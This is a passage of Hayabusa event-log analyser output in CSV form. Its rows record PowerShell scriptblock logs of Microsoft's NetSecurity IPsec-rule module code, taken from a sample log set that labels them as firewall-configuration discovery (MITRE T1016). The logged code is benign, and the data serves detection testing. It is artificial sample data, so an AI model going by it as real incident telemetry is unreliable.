[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Manage",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ment.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 
'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 
'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.Paramete",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"rSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', 
${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try 
{ if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
